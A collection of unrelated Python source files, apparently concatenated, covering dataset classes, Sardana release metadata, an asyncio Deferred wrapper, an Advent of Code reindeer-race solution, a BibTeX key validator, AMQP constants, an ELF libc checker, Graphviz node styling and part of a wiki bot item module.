        """Return the raw C handle for passing to native calls."""
        return self.__obj
|
import pandas as pd
import numpy as np
class DataSet(object):
    """Abstract interface for sample sources; all hooks are no-ops here."""
    def __init__(self):
        pass
    def append(self):
        """Add a datum to the set (no-op in the base class)."""
        pass
    def sample(self):
        """Return a batch of data (no-op in the base class)."""
        pass
    def clear(self):
        """Drop all stored data (no-op in the base class)."""
        pass
class NPArrayDataSet(DataSet):
    """DataSet backed by in-memory numpy arrays X (features) and Y (labels).

    In batch mode sample() draws batch_size random rows (with replacement);
    otherwise it returns the full arrays.
    """
    def __init__(self, X, Y, batch_mode=False, batch_size=32):
        self.X = X
        self.Y = Y
        self.Xshape = X.shape
        self.batch_mode = batch_mode
        self.batch_size = batch_size
    def sample(self):
        """Return (X, Y), or a random (X_batch, Y_batch) in batch mode."""
        # Bug fix: 'self' was missing from the signature and X/Y were
        # referenced as bare names, so this method always raised.
        if not self.batch_mode:
            return (self.X, self.Y)
        ids = np.random.choice(self.Xshape[0], self.batch_size)
        return (self.X[ids], self.Y[ids])
    def clear(self):
        """Release both arrays."""
        # Bug fix: 'self' was missing from the signature.
        self.X = None
        self.Y = None
class DataframeDataSet(DataSet):
    """DataSet that eagerly loads a CSV file into a pandas DataFrame."""
    def __init__(self, file_path):
        self.data = pd.read_csv(file_path)
    def sample(self):
        """Return the whole DataFrame."""
        return self.data
    def clear(self):
        """Release the DataFrame."""
        self.data = None
class ListDataSet(DataSet):
    """DataSet accumulating arbitrary items in a Python list."""
    def __init__(self, batch_mode=False, batch_size=32):
        self.data = []
        self.batch_mode = batch_mode
        self.batch_size = batch_size
    def append(self, d):
        """Store one item."""
        self.data.append(d)
    def sample(self):
        """Return all items, or a random batch (with replacement) in batch mode."""
        # Idiom fix: truth-test the flag instead of comparing '== False'.
        if not self.batch_mode:
            return self.data
        ids = np.random.choice(len(self.data), self.batch_size)
        return [self.data[i] for i in ids]
    def clear(self):
        """Drop all stored items."""
        self.data = []
class LookbackDataSet(ListDataSet):
    """ListDataSet whose sample() returns only the most recent items."""
    def __init__(self, lookback):
        super(LookbackDataSet, self).__init__()
        self.lookback = lookback
    def sample(self):
        """Return the last `lookback` items appended."""
        window = self.data[-self.lookback:]
        return window
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
##############################################################################
##
# This file is part of Sardana
##
# http://www.sardana-controls.org/
##
# Copyright 2011 CELLS / ALBA Synchrotron, Bellaterra, Spain
##
# Sardana is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
##
# Sardana is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
##
# You should have received a copy of the GNU Lesser General Public License
# along with Sardana. If not, see <http://www.gnu.org/licenses/>.
##
##############################################################################
__docformat__ = "restructuredtext"
# NOTE(review): because ``__docformat__`` precedes it, the string literal
# below is a plain expression statement, not the module docstring
# (``__doc__`` stays None) — confirm whether it was meant to come first.
"""
Release data for the sardana project. It contains the following members:
- version : (str) version string
- description : (str) brief description
- long_description : (str) a long description
- license : (str) license
- authors : (dict<str, tuple<str,str>>) the list of authors
- url : (str) the project url
- download_url : (str) the project download url
- platforms : list<str> list of supported platforms
- keywords : list<str> list of keywords
"""
#: Name of the package for release purposes. This is the name which labels
#: the tarballs and RPMs made by distutils, so it's best to lowercase it.
name = 'sardana'
# we use semantic versioning (http://semver.org/) and we update it using the
# bumpversion script (https://github.com/peritus/bumpversion)
version = '3.0.4.11'
description = "instrument control and data acquisition system"
long_description = \
    '''Sardana is a Supervision, Control And Data Acquisition (SCADA) system for
scientific installations. It is written in Python and based on the TANGO
library. The hardware control and data acquisition routines can be
accessed via an IPython console and a generic graphical user interface
(both of which are easily extensible by the user).'''
# NOTE: 'license' shadows the builtin of the same name; harmless in a
# metadata-only module.
license = 'LGPL'
authors = {'Tiago_et_al': ('Tiago Coutinho et al.', ''),
           'Community': ('Sardana Community',
                         'sardana-devel@lists.sourceforge.net'),
           }
url = 'http://www.sardana-controls.org'
download_url = 'http://pypi.python.org/packages/source/s/sardana'
platforms = ['Linux', 'Windows XP/2000/NT', 'Windows 95/98/ME']
keywords = ['Sardana', 'Tango', 'Python', 'Control System']
|
import asyncio
# A wrapper class for asyncio.Future so we can use errorBacks
# (also so I don't have to change a hundred lines of code...)
class Deferred:
    """Minimal Twisted-Deferred-style facade over an asyncio.Future.

    Callbacks added with addCallback fire with the result when the future
    completes successfully; errbacks added with addErrback fire with the
    exception when it fails.
    """
    def __init__(self):
        self.f = asyncio.Future()
    def __cb(self, fut, func):
        # Bug fix: the old check `fut.done() and fut.result()` (a) re-raised
        # the stored exception inside the done-callback when the future had
        # failed and (b) silently skipped the callback for falsy results
        # such as 0, '' or None.
        if fut.done() and not fut.cancelled() and fut.exception() is None:
            return func(fut.result())
        return None
    def addCallback(self, func):
        """Schedule func(result) for when the future succeeds."""
        self.f.add_done_callback(lambda fut: self.__cb(fut, func))
    def callback(self, res):
        """Resolve the future with res."""
        self.f.set_result(res)
        return self.f
    def __eb(self, fut, func):
        # Runs func only when the future actually failed with an exception
        # (cancelled futures raise from .exception(), so guard that too).
        if fut.done() and not fut.cancelled() and fut.exception() is not None:
            return func(fut.exception())
        return None
    def addErrback(self, func):
        """Schedule func(exception) for when the future fails."""
        self.f.add_done_callback(lambda fut: self.__eb(fut, func))
    def errback(self, exc):
        """Fail the future with exc."""
        self.f.set_exception(exc)
        return self.f
|
import asyncio
from pipelines.plumber import Plumber
from test_workflow import StringFunc
def getcoro(name):
    """Resolve a coroutine reference.

    Callables are returned unchanged; known dotted-name strings are mapped
    to the corresponding StringFunc attribute.  Raises KeyError for
    unknown names.
    """
    # Check callability first so the mapping (and the StringFunc names it
    # references) is only evaluated when a string lookup is actually needed.
    if callable(name):
        return name
    return {
        'StringFunc.reverse' : StringFunc.reverse,
        'StringFunc.toupper' : StringFunc.toupper,
        'StringFunc.tolower' : StringFunc.tolower,
        'StringFunc.input_str': StringFunc.input_str,
        'StringFunc.output_str': StringFunc.output_str,
    }[name]
async def main():
    """Build a small string-processing pipeline and print its wiring."""
    spec = {
        'nodes': {
            'inp': {'coro': StringFunc.input_str, 'args': { 'num': 20 }},
            'n1' : {'coro': StringFunc.reverse },
            'n2' : {'coro': 'StringFunc.toupper'},
            'n3' : {'coro': 'StringFunc.tolower'},
            'n4' : {'coro': 'StringFunc.output_str', 'properties': {'aggregate_inputs': False}},
        },
        'graph': {
            'inp': ('n1',),
            'n1' : ('n2', 'n3'),
            'n2' : ('n3', 'n4'),
            'n3' : ('n4',),
            'n4' : None,
        },
    }
    plumber = Plumber(spec, coro_map = getcoro )
    plumber.create_pipeline()
    # Dump queue wiring, then the coroutine attached to each node.
    for _q in plumber.nodes:
        print(f':. name ~> {_q.name}., input ~> {_q.liason_queues[0]}, output~> {_q.liason_queues[1]}')
    for _q in plumber.nodes:
        print(f":. name ~> {_q.name}, coro ~> {_q.processor_coro}")
if __name__ == '__main__':
    # Schedule the pipeline setup, then run the loop forever so the
    # pipeline's node tasks keep executing after main() returns.
    # NOTE(review): asyncio.get_event_loop() outside a running loop is
    # deprecated since Python 3.10 — confirm target version.
    asyncio.get_event_loop().create_task(main())
    asyncio.get_event_loop().run_forever()
|
import re
from itertools import cycle
########
# PART 1
'''
Vixen can fly 8 km/s for 8 seconds, but then must rest for 53 seconds.
Blitzen can fly 13 km/s for 4 seconds, but then must rest for 49 seconds.
Rudolph can fly 20 km/s for 7 seconds, but then must rest for 132 seconds.
Cupid can fly 12 km/s for 4 seconds, but then must rest for 43 seconds.
Donner can fly 9 km/s for 5 seconds, but then must rest for 38 seconds.
Dasher can fly 10 km/s for 4 seconds, but then must rest for 37 seconds.
Comet can fly 3 km/s for 37 seconds, but then must rest for 76 seconds.
Prancer can fly 9 km/s for 12 seconds, but then must rest for 97 seconds.
Dancer can fly 37 km/s for 1 seconds, but then must rest for 36 seconds.
'''
def process_line(line):
    """Parse one reindeer line into (name, speed, fly_time, rest_time)."""
    name, speed, fly_time, rest_time = re.match(
        r"(.*) can fly (\d+) km/s for (\d+) seconds, but then must rest for (\d+) seconds.",
        line).groups()
    return name, int(speed), int(fly_time), int(rest_time)
def process_file(fn):
    """Read a puzzle input file into {name: [(speed, fly_time), (0, rest_time)]}."""
    ret = {}
    with open(fn, 'r') as f:
        for line in f:
            deer, speed, fly_time, wait = process_line(line)
            ret[deer] = [(speed, fly_time), (0, wait)]
    return ret
def move(deer, time):
    """Distance covered after `time` seconds.

    `deer` is a list of (speed, duration) phases cycled forever; rest
    phases are encoded with speed 0.
    """
    dist = 0
    phases = cycle(deer)
    remaining = time
    while remaining > 0:
        speed, duration = next(phases)
        step = min(remaining, duration)
        dist += speed * step
        remaining -= step
    return dist
def run(deers, t):
    """Greatest distance travelled by any deer after t seconds."""
    return max(move(speeds, t) for speeds in deers.values())
# Sanity-check move/run against the worked example from the puzzle text.
deers = {}
deers['comet'] = [(14, 10), (0, 127)]
deers['dancer'] = [(16, 11), (0, 162)]
assert run(deers, 1000) == 1120
deers = process_file("event2015/day14/input.txt")
time = 2503
answer = run(deers, time)
print("Part 1 =", answer)
assert answer == 2655 # check with accepted answer
########
# PART 2
# New scoring: after each whole second every deer currently in the lead
# earns one point; the answer is the best final score.
# scores maps deer -> (score, current distance).
scores = { deer: (0,0) for deer in deers }
for t in range(1, time + 1):
    # Recompute each position from scratch every tick (O(t) per tick,
    # fine for t = 2503).
    for deer, speeds in deers.items():
        dist = move(speeds, t)
        scores[deer] = (scores[deer][0], dist)
    first_place = max([dist for (_, (_, dist)) in scores.items()])
    # Every deer tied for the lead gets a point.
    for deer, (score, dist) in scores.items():
        scores[deer] = (score + 1, dist) if dist == first_place else (score, dist)
#print(sorted(scores.items(), key = lambda x: x[1][0], reverse = True))
answer = max([x for x, _ in scores.values()])
print("Part 2 =", answer)
assert answer == 1059 # check with accepted answer
|
#!/Library/Frameworks/Python.framework/Versions/3.6/bin/python3
### /usr/bin/python
### /Library/Frameworks/Python.framework/Versions/3.6/bin/python3
"""
This Python script is written by Zhiyang Ong to determine if
a BibTeX key is valid.
Synopsis:
Check the validity of a BibTeX key.
Notes/Assumptions:
Assume that a BibTeX key has no white space, and is a
contiguous sequence of alphanumeric characters.
If a BibTeX key contains characters that are not alphanumeric,
it is invalid.
If a BibTeX key contains white space, it is invalid.
While the BibTeX key can contain different symbols, apart
from commas, only alphanumeric characters shall be used
\cite{Ong2017}.
Tokenize the first line of each BibTeX entry such that it
would contain exactly two tokens: the BibTeX entry type
(without the "@" prefix) and the BibTeX key.
When the first line of a BibTeX entry is tokenized, its
first token shall match a standard BibTeX entry type,
and its second token shall be its BibTeX key.
If the first token does not match a standard BibTeX entry type,
raise an exception to inform the users of this error.
If the second token is an empty string or missing, raise
an exception to inform the users that the BibTeX key
is missing.
If more than two tokens (i.e., three or more) exist, raise
an exception to inform the users about the non-compliance
to guidelines \cite{Ong2017} for managing the database.
Revision History:
December 19, 2017 Version 0.1, initial build.
"""
__author__ = 'Zhiyang Ong'
__version__ = '1.0'
__date__ = 'December 19, 2017'
# The MIT License (MIT)
# Copyright (c) <2014-2017> <Zhiyang Ong>
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# Email address: echo "cukj -wb- 23wU4X5M589 TROJANS cqkH wiuz2y 0f Mw Stanford" | awk '{ sub("23wU4X5M589","F.d_c_b. ") sub("Stanford","d0mA1n"); print $5, $2, $8; for (i=1; i<=1; i++) print "6\b"; print $9, $7, $6 }' | sed y/kqcbuHwM62z/gnotrzadqmC/ | tr 'q' ' ' | tr -d [:cntrl:] | tr -d 'ir' | tr y "\n" Che cosa significa?
###############################################################
"""
Import modules from The Python Standard Library.
sys Get access to any command-line arguments.
os Use any operating system dependent functionality.
os.path For pathname manipulations.
subprocess -> call
To make system calls.
time To measure elapsed time.
warnings Raise warnings.
re Use regular expressions.
collections -> namedtuple
To use named tuples.
operator -> attrgetter
To manipulate attributes of a named tuple as callable
objects.
string Get access to string-specific methods.
"""
#import sys
#import os
#import os.path
#from subprocess import call
#import time
import warnings
import re
#from collections import namedtuple
#from operator import attrgetter
import string
###############################################################
# Import Custom Python Modules
# Module to process input arguments to the script/program.
from utilities.queue_ip_arguments import queue_ip_args
###############################################################
"""
Module with methods that check the validity of a BibTeX key.
Support for class instantiation is not provided, to avoid
acquiring a collection of useless "check_bibtex_key"
objects.
Check if all methods return a boolean TRUE to indicate that
all the conditions required for a valid BibTeX key are
TRUE, or indicate the condition(s) that cause the BibTeX
key to be invalid.
Check if none of the characters in the string are whitespace
characters; that is, check that the string has no white
space.
Check if all the characters in the string are alphanumeric
characters; there are no special characters in the string.
"""
class check_bibtex_key:
    """
    Namespace of static methods that check the validity of a BibTeX key.

    Support for class instantiation is not provided, to avoid acquiring a
    collection of useless "check_bibtex_key" objects.

    A BibTeX key is valid when it contains no whitespace characters and
    consists solely of alphanumeric characters.
    """
    # =========================================================
    # Method to check the validity of a BibTeX key.
    # @param str - A string containing the BibTeX key.
    # @return a boolean TRUE if the BibTeX key is valid.
    #	Else, return FALSE.
    # O(n) method, where n is the number of characters of the key.
    @staticmethod
    def is_bibtex_key_valid(str):
        # BUG FIX: the helpers are static methods of this class, so they
        # must be called via the class name; the original unqualified calls
        # raised NameError at runtime.
        return (check_bibtex_key.has_no_whitespace(str)
                and check_bibtex_key.has_only_alphanumeric_characters(str))
    # =========================================================
    # Method to check if the BibTeX key has white space.
    #
    # @param str - A string containing the BibTeX key.
    # @return a boolean TRUE if the BibTeX key has no white space.
    #	Else, return FALSE.
    # O(n) method, where n is the number of characters of the key.
    @staticmethod
    def has_no_whitespace(str):
        # BUG FIX: the original tokenized on '\t| |\n' only, so keys
        # containing '\r', '\v', or '\f' were wrongly accepted.  The regex
        # character class \s covers every whitespace character, and a raw
        # string avoids relying on escape-sequence coincidences.
        return re.search(r'\s', str) is None
    # =========================================================
    # Method to check if the BibTeX key has only alphanumeric
    #	characters.
    # @param str - A string containing the BibTeX key.
    # @return a boolean TRUE if the key is non-empty and entirely
    #	alphanumeric; else FALSE.  (Doc fix: the original comment
    #	claimed this returns nothing.)
    # O(n) method, where n is the number of characters of the key.
    @staticmethod
    def has_only_alphanumeric_characters(str):
        return str.isalnum()
    # =========================================================
    # Method to tokenize the first line of each BibTeX entry,
    #	which contains a unique BibTeX key.
    #
    # Tokenize the string such that it would contain exactly
    #	two tokens, the BibTeX entry type (without the "@"
    #	prefix) and the BibTeX key.
    #
    # When the first line of a BibTeX entry is tokenized, its
    #	first token shall match a standard BibTeX entry type,
    #	and its second token shall be its BibTeX key.
    # If the first non-empty token does not match a standard
    #	BibTeX entry type, raise an exception to inform the
    #	users of this error.
    # If the second non-empty token is an empty string or
    #	missing, raise an exception to inform the users
    #	that the BibTeX key is missing.
    # If more than two non-empty tokens (i.e., three or more)
    #	exist, raise an exception to inform the users about
    #	the non-compliance to guidelines \cite{Ong2017} for
    #	managing the database.
    #
    # @param str - The first line of a BibTeX entry,
    #	e.g. "@article{Key,".
    # @return a tokenized string representing the BibTeX key.
    # @throws Exception on any deviation from the expected
    #	"@type{key," format.
    # O(n) method, where n is the character length of the string.
    @staticmethod
    def tokenization_entry_key(str):
        # Splitting "@type{key," on '@', '{' and ',' yields exactly four
        # tokens: ['', type, key, ''].
        tokenized_BibTeX_entry = re.split('@|{|,', str)
        if len(tokenized_BibTeX_entry) > 4:
            # Too many tokens: extra delimiters in the first line.
            raise Exception("	Non-compliance to BibTeX guidelines!!!")
        elif len(tokenized_BibTeX_entry) == 4:
            # Is the type of the BibTeX entry valid?
            if (tokenized_BibTeX_entry[1] in queue_ip_args.BibTeX_entry_types):
                # Yes. Is the 4th token a non-empty string?
                if tokenized_BibTeX_entry[3]:
                    # Yes. Report non-compliance to BibTeX guidelines.
                    raise Exception("	Non-compliance to BibTeX guidelines! Extra token found in 1st line of BibTeX entry.")
                # No. The third token is the BibTeX key.
                return tokenized_BibTeX_entry[2]
            else:
                # No. Warn user that the type of BibTeX entry is invalid!
                temp_str = "==>	Invalid type of BibTeX entry:"+tokenized_BibTeX_entry[1]
                warnings.warn(temp_str)
                raise Exception("BibTeX entry has an invalid type!")
        elif len(tokenized_BibTeX_entry) == 1:
            # No delimiter at all: nothing after the entry type.
            raise Exception("	BibTeX key is missing!!!")
        else:
            # Two or three tokens: malformed first line.
            raise Exception("	String tokenization error!!!")
|
# AMQP 0-9-1 frame types.
FRAME_METHOD = 1
FRAME_HEADER = 2
FRAME_BODY = 3
FRAME_HEARTBEAT = 8
# Protocol-mandated minimum frame size and frame terminator octet.
FRAME_MIN_SIZE = 4096
FRAME_END = 206
# Reply codes.
REPLY_SUCCESS = 200
CONTENT_TOO_LARGE = 311  # soft-error
NO_ROUTE = 312  # soft-error
NO_CONSUMERS = 313  # soft-error
ACCESS_REFUSED = 403  # soft-error
NOT_FOUND = 404  # soft-error
RESOURCE_LOCKED = 405  # soft-error
PRECONDITION_FAILED = 406  # soft-error
CONNECTION_FORCED = 320  # hard-error
INVALID_PATH = 402  # hard-error
FRAME_ERROR = 501  # hard-error
SYNTAX_ERROR = 502  # hard-error
COMMAND_INVALID = 503  # hard-error
CHANNEL_ERROR = 504  # hard-error
UNEXPECTED_FRAME = 505  # hard-error
RESOURCE_ERROR = 506  # hard-error
NOT_ALLOWED = 530  # hard-error
NOT_IMPLEMENTED = 540  # hard-error
INTERNAL_ERROR = 541  # hard-error
# Reverse lookup: numeric code -> constant name.
# CONSISTENCY FIX: built from the constants themselves instead of repeating
# every numeric literal, so the mapping cannot drift out of sync with the
# values defined above.
id2constant = {
    FRAME_METHOD: "FRAME_METHOD",
    FRAME_HEADER: "FRAME_HEADER",
    FRAME_BODY: "FRAME_BODY",
    FRAME_HEARTBEAT: "FRAME_HEARTBEAT",
    FRAME_MIN_SIZE: "FRAME_MIN_SIZE",
    FRAME_END: "FRAME_END",
    REPLY_SUCCESS: "REPLY_SUCCESS",
    CONTENT_TOO_LARGE: "CONTENT_TOO_LARGE",
    NO_ROUTE: "NO_ROUTE",
    NO_CONSUMERS: "NO_CONSUMERS",
    ACCESS_REFUSED: "ACCESS_REFUSED",
    NOT_FOUND: "NOT_FOUND",
    RESOURCE_LOCKED: "RESOURCE_LOCKED",
    PRECONDITION_FAILED: "PRECONDITION_FAILED",
    CONNECTION_FORCED: "CONNECTION_FORCED",
    INVALID_PATH: "INVALID_PATH",
    FRAME_ERROR: "FRAME_ERROR",
    SYNTAX_ERROR: "SYNTAX_ERROR",
    COMMAND_INVALID: "COMMAND_INVALID",
    CHANNEL_ERROR: "CHANNEL_ERROR",
    UNEXPECTED_FRAME: "UNEXPECTED_FRAME",
    RESOURCE_ERROR: "RESOURCE_ERROR",
    NOT_ALLOWED: "NOT_ALLOWED",
    NOT_IMPLEMENTED: "NOT_IMPLEMENTED",
    INTERNAL_ERROR: "INTERNAL_ERROR",
}
|
import os, sys, subprocess, signal
import logging
import optparse
import util
def isValidOpts(opts):
    """
    Check if the required options are sane to be accepted
        - Check that the output folder path (-o) was provided
    :param opts: parsed optparse options object
    :return: True if the options are valid, False otherwise
    """
    # BUG FIX: the original read the module-level ``options`` instead of
    # the ``opts`` parameter it was given, making the parameter dead and
    # the function unusable before ``options`` existed.
    # NOTE(review): ``parser.error`` still refers to the module-level
    # parser built in __main__; changing that would alter the interface.
    if not opts.outputpath:
        parser.error("Option -o should be provided.")
        return False
    return True
def setLogPath(logPath):
    """
    Set the property of the logger: path, config, and format
    :param logPath: path of the log file; any existing file at this path
        is removed so each run starts with a fresh log
    :return: the configured "coverage" logger
    """
    # Start from a clean log file on every run.
    if os.path.exists(logPath):
        os.remove(logPath)
    rootLogger = logging.getLogger("coverage")
    # NOTE(review): relies on the module-level ``options`` parsed in
    # __main__; calling this before option parsing raises NameError.
    if options.debug:
        logging.basicConfig(filename=logPath, level=logging.DEBUG)
        rootLogger.setLevel(logging.DEBUG)
    else:
        logging.basicConfig(filename=logPath, level=logging.INFO)
        rootLogger.setLevel(logging.INFO)
    # ch = logging.StreamHandler(sys.stdout)
    # Mirror log records to the console in addition to the file.
    consoleHandler = logging.StreamHandler()
    rootLogger.addHandler(consoleHandler)
    return rootLogger
    # rootLogger.addHandler(ch)
if __name__ == '__main__':
    """
    Main function for finding physical memory usage of process
    """
    # NOTE(review): usage string mentions -e/-p but only -o/-d are defined;
    # looks copied from a sibling script -- confirm intended options.
    usage = "Usage: %prog -e <Target executable path> -p <PID of process to retrieve information about>"
    parser = optparse.OptionParser(usage=usage, version="1")
    parser.add_option("-o", "--outputpath", dest="outputpath", default=None, nargs=1,
                      help="Output folder path")
    parser.add_option("-d", "--debug", dest="debug", action="store_true", default=False,
                      help="Debug enabled/disabled")
    (options, args) = parser.parse_args()
    if isValidOpts(options):
        rootLogger = setLogPath("checkstaticlibc.log")
        lib = ".so"
        # Walk each image folder under the output path and flag ELF
        # executables whose dynamic header mentions neither libc nor musl.
        for folderName in os.listdir(options.outputpath):
            fileList = list()
            removeList = list()
            rootLogger.info("////////////Checking image: %s//////////////////", folderName)
            folderName = os.path.join(options.outputpath, folderName)
            if ( os.path.isdir(folderName) ):
                for fileName in os.listdir(folderName):
                    if ( util.isElf(folderName + "/" + fileName) ):
                        # Shared objects (".so" in the name) are skipped.
                        if ( lib not in fileName ):# or fileName.startswith(exceptItem) or util.isGo(folderName + "/" + fileName, rootLogger) ):
                            fileHeader = util.extractDynamicHeader(folderName + "/" + fileName)
                            if ( fileHeader != "" and "libc" not in fileHeader and "musl" not in fileHeader ):
                                rootLogger.info("elf without libc: %s", fileHeader)
            # Dead code kept from an earlier syscall-extraction pass.
            '''finalSet = set(fileList) - set(removeList)
#            rootLogger.info("List of binaries for %s: %s", folderName, str(finalSet))
            for filePath in finalSet:
                #rootLogger.debug("extraction direct syscall for %s", filePath)
                temp1 = util.extractDirectSyscalls(filePath, rootLogger)
                temp2 = util.extractLibcSyscalls(filePath, rootLogger)
                if ( temp1 != 0 or temp2 != 0 ):
                    rootLogger.debug("filePath: %s is libcSyscall: %d directSyscall: %d", filePath, temp2, temp1)'''
|
"""Module for handling the different draw options for nodes. Used when creating a .dot file representation of the pipeline."""
# Base Graphviz attributes shared by every node type.
_DEFAULT_DRAW_OPTIONS = {'shape': 'box', 'style': 'filled'}
# Per-node-type fill colours (hex RGB/RGBA).
_DEFAULT_AQP_OPTIONS = {'fillcolor': '#ffffff'}
_DEFAULT_VISQOL_OPTIONS = {'fillcolor': '#F0E442B3'}
_DEFAULT_PESQ_OPTIONS = {'fillcolor': '#E69F00B3'}
_DEFAULT_WARP_Q_OPTIONS = {'fillcolor': '#0072B2B3'}
_DEFAULT_NESTED_OPTIONS = {'fillcolor': '#009E73B3'}
# Lookup of node-type name -> that type's specific draw options.
DRAW_OPTIONS = {
    'AQP': _DEFAULT_AQP_OPTIONS,
    'ViSQOL': _DEFAULT_VISQOL_OPTIONS,
    'PESQ': _DEFAULT_PESQ_OPTIONS,
    'WARP-Q': _DEFAULT_WARP_Q_OPTIONS,
    'NESTED': _DEFAULT_NESTED_OPTIONS
}
def create_full_options(default_options: dict=_DEFAULT_DRAW_OPTIONS,
                        other_options: dict=None):
    """Merge the default options and other options to create the full dict of draw options.

    Merges the draw options dict passed from JSON with the default options for
    a particular node type.  Later dictionaries win on key collisions, in the
    order: global defaults, node-type defaults, JSON-supplied options.

    Parameters
    ----------
    default_options : dict, optional
        The default options unique for a particular node type to be used.
        The default is _DEFAULT_DRAW_OPTIONS.
    other_options : dict, optional
        Any other draw options passed from JSON. The default is None.

    Returns
    -------
    draw_options: dict
        Merged dict from the two dictionaries passed to the function.
    """
    merged = dict(_DEFAULT_DRAW_OPTIONS)
    merged.update(default_options)
    if other_options is not None:
        merged.update(other_options)
    return merged
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import json
import os
import html
import re
import decimal
import math
from collections import OrderedDict
from contextlib import suppress
import requests
from SFIWikiBotLib import Config
from SFIWikiBotLib import SmallConstants
from SFIWikiBotLib import GeneralUtils
from SFIWikiBotLib import WikiUtils
from SFIWikiBotLib import GalaxyUtils
from SFIWikiBotLib import DataLoader
# Multiplier applied to an item's base value to get its purchase price.
itemPurchasePriceModifier = 1.175
# itemPurchasePriceModifier = 1.17645 # I believe this is the correct value but need to re-test to be sure
# Multiplier used when deriving per-shot ammunition cost.
ammoCostModifier = 0.144
# Items excluded from processing, matched by exact name.
itemsToSkip = [
    "Disheartener Beacon",
    "Double Barrelled Heavy Bolt I",
    "Double Barrelled Heavy Bolt II",
    "Double Barrelled Heavy Bolt III",
    "Double Barrelled Heavy Bolt IV",
    "Double Barrelled Heavy Bolt V",
    "Wabbajack",
    "Big Smoke Screen",
    "Firework Pellet",
    "Cake Slice",
    "Candle Torpedo",
    "Micro Gate TBZ",
    "Tyraan Decay Cannon",
    "Shard Torpedo",
    "Igni Rock Rocket I",
]
# Id-based counterpart of itemsToSkip; presumably filled at load time -- TODO confirm.
itemIdListToSkip = []
# Items to treat as beam weapons regardless of their recorded type.
beamWeaponOverrideList = [
    'Resonator Beam'
]
# Id-based counterpart of beamWeaponOverrideList; presumably filled at load time -- TODO confirm.
beamWeaponOverrideIdList = []
# Items that drop rarely from player races.
rarePlayerRaceDropList = [
    'Dimensional Clone Bomb',
    'Crate of Meat Patties',
    'Promotional Burger',
]
# Id-based counterpart of rarePlayerRaceDropList; presumably filled at load time -- TODO confirm.
rarePlayerRaceDropIdList = []
# Item data caches.  All start empty/None here; NOTE(review): the loading
# code is not visible in this chunk -- these are populated elsewhere.
itemData = None
itemDataDict = None
itemRangeData = None
itemVariantData = None
itemCraftableData = None
itemDataPublic = None
itemDataPrivate = None
itemBaseNameList = []
class ItemPageIter:
    """Iterator that takes an item list and groups it by item set.

    Each element yielded is one sorted group of items that share an item
    range (i.e. belong on the same wiki page).
    """

    def __init__(self, itemList=...):
        # ``...`` sentinel: default to the module-level item data.
        if itemList is ...:
            itemList = itemData
        remaining = list(itemList)
        self.itemPageList = []
        self.pos = 0
        # Repeatedly peel off the group sharing a range with the last
        # remaining item until nothing is left.
        while remaining:
            group = GetAllItemsSharingItemRange(remaining[-1], remaining)
            group = sorted(group, key=GetItemSortFunc())
            self.itemPageList.append(group)
            remaining = [entry for entry in remaining if entry not in group]

    def __iter__(self):
        return self

    def __len__(self):
        return len(self.itemPageList)

    def __next__(self):
        if self.pos >= len(self.itemPageList):
            raise StopIteration
        page = self.itemPageList[self.pos]
        self.pos += 1
        return page

    def reset(self):
        """Rewind the iterator to the first page group."""
        self.pos = 0
def FindAllObjectsRelatedToId(id):
    """Return every item, range, variant, and craftable entry referencing *id*."""
    # Fields that may reference the id, with the operator used for each.
    fieldOperators = [
        ('id', '=='),
        ('range', '=='),
        ('items', 'in_list'),
        ('subWeaponID', '=='),
    ]
    ruleSet = {
        'condition': 'OR',
        'rules': [
            {'id': field, 'operator': op, 'value': id}
            for field, op in fieldOperators
        ],
    }
    matches = GeneralUtils.SearchObjectListUsingRuleset(itemData, ruleSet)
    matches += GeneralUtils.SearchObjectListUsingRuleset(itemRangeData.values(), ruleSet)
    matches += GeneralUtils.SearchObjectListUsingRuleset(itemVariantData, ruleSet)
    matches += GeneralUtils.SearchObjectListUsingRuleset(itemCraftableData.values(), ruleSet)
    return matches
def GetListOfItemsMissingWikiPages(includeHidden=False):
    """Return items (type > 1) that have no wiki article page.

    Hidden items are excluded unless *includeHidden* is True.
    """
    missing = []
    for item in itemData:
        if GetItemWikiArticlePage(item) or item['type'] <= 1:
            continue
        if includeHidden or not IsItemHidden(item):
            missing.append(item)
    return missing
def FindItemsByPartialName(name, objList=...):
    """Return items whose name contains *name*, sorted with the standard item sort."""
    # ``...`` sentinel: default to the module-level item data.
    if objList is ...:
        objList = itemData
    containsRule = {"id": "name", "operator": "contains", "value": name}
    ruleSet = {"condition": "OR", "rules": [containsRule]}
    matches = GeneralUtils.SearchObjectListUsingRuleset(objList, ruleSet)
    return sorted(matches, key=GetItemSortFunc())
def DownloadMissingImagesForTheWikiByItemList(itemList):
    """Download images only for items without a wiki image; return the count saved."""
    savedCount = 0
    for item in itemList:
        if GetItemWikiImage(item):
            continue
        if DownloadImageForItem(item):
            savedCount += 1
    return savedCount
def DownloadImagesByItemList(itemList):
    """Attempt a download for every item; return the number of images saved."""
    return sum(1 for item in itemList if DownloadImageForItem(item))
def DownloadImageForItem(item):
    """
    Download the icon image for *item* into public/images/<type>/<icon>.png.

    Skips the download when the file already exists on disk.

    :param item: item record (dict) with 'type', 'id', 'name' and optional 'iconName'
    :return: True when a new image was saved, False otherwise
    :raises: re-raises any download/write error after printing context
    """
    rtnVal = False
